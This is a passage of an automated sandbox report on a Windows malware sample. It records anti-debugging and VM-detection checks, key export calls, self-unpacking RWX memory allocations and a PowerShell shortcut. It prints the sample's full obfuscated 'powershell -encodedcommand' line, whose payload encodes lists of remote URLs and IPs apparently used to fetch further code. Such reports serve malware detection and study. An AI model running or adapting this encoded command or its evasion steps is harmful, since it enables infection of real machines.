VABBAEgAVQBBAFkAZwBCAGgAQQBIAFUAQQBaAEEAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAOABBACIAOwB9AH0AJABpAGcAbgBhAHQAaQB1AHMARgBsAHUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBPAFEAQQB1AEEARABnAEEATgB3AEEAdQBBAEQARQBBAE4AUQBBADQAQQBDADQAQQBPAEEAQQA1AEEAQQA9AD0AdwBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcATQBBAGMAZwBCAHYAQQBHAEkAQQBhAFEAQgB6AEEAQwA0AEEAYgBRAEIAaQBBAEcARQBBACIAOwA="
    2828

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 24, 2023, 11:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 24, 2023, 11:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2023, 11:04 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 24, 2023, 11:04 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ac08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048ad08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048b108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048b108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048b108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2023, 11:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048b108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 24, 2023, 11:04 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 133 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2716 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0232a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02322000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02332000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02333000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02334000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0232b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02335000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02336000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05131000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05133000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05134000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05135000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05138000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05139000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05141000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:04 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -encodedcommand "JABwAGEAbABtAGUAbABsAG8AaQBkAFMAZQBuAHMAYQB0AGkAbwBuAGkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAawBBAGIAZwBCAGwAQQBIAGcAQQBiAHcAQgB5AEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBKAEEASABNAEEAYgB3AEIAeABBAEgAVQBBAGEAUQBCAHUAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQBKAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAaQBBAEgASQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQgBUAEEARwA0AEEAYgB3AEIAaQBBAEcASQBBAGEAUQBCAHoAQQBHAGcAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEcATQBBAFkAUQBCAHQAQQBHAFUAQQBjAGcAQgBoAEEAQQA9AD0ASgBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE8AQQBBAHUAQQBEAEkAQQBNAGcAQQB5AEEAQwA0AEEATgBRAEEAdwBBAEMANABBAE0AUQBBADAAQQBEAFUAQQAiADsAJABsAGkAcQB1AGUAZgBpAGUAcwBVAG4AdwBhAGQAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgB3AEEAegBBAEMANABBAE0AUQBBAHgAQQBEAGcAQQBMAGcAQQA0AEEARABRAEEAVgBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBBAEEAdQBBAEQARQBBAE4AdwBBADAAQQBDADQAQQBOAHcAQQA0AEEAQwA0AEEATgB3AEEANQBBAEEAPQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAFoAUQBCADAAQQBIAFEAQQBhAFEAQgB0AEEARwBFAEEATABnAEIAagBBAEcARQBBAGMAdwBCAHAAQQBHADQAQQBiAHcAQQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAFEAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAdwBBAEMANABBAE0AUQBBADEAQQBEAGsAQQAiADsAJABzAHQAbwBjAGsAbQBhAGsAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBJAEEAYgB3AEIAeQBBAEcAYwBBAGEAQQBCAHAAQQBGAEkAQQBaAFEAQgBqAEEARwA4AEEAYgBnAEIAbQBBAEcAawBBAGMAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGoAQQBHADgAQQBiAGcAQgB6AEEASABVAEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAG4AQQBHADgAQQBiAEEAQgBrAEEAQQA9AD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEARwBVAEEAZABBAEIAeQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQgBGAEEASABnAEEAZABBAEIAeQBBAEgAVQBBAGMAdwBCAHAAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWgBRAEIAdQBBAEgAUQBBAFoAUQBCAHkAQQBIAEEAQQBjAGcAQgBwAEEASABNAEEAWgBRAEIAegBBAEEAPQ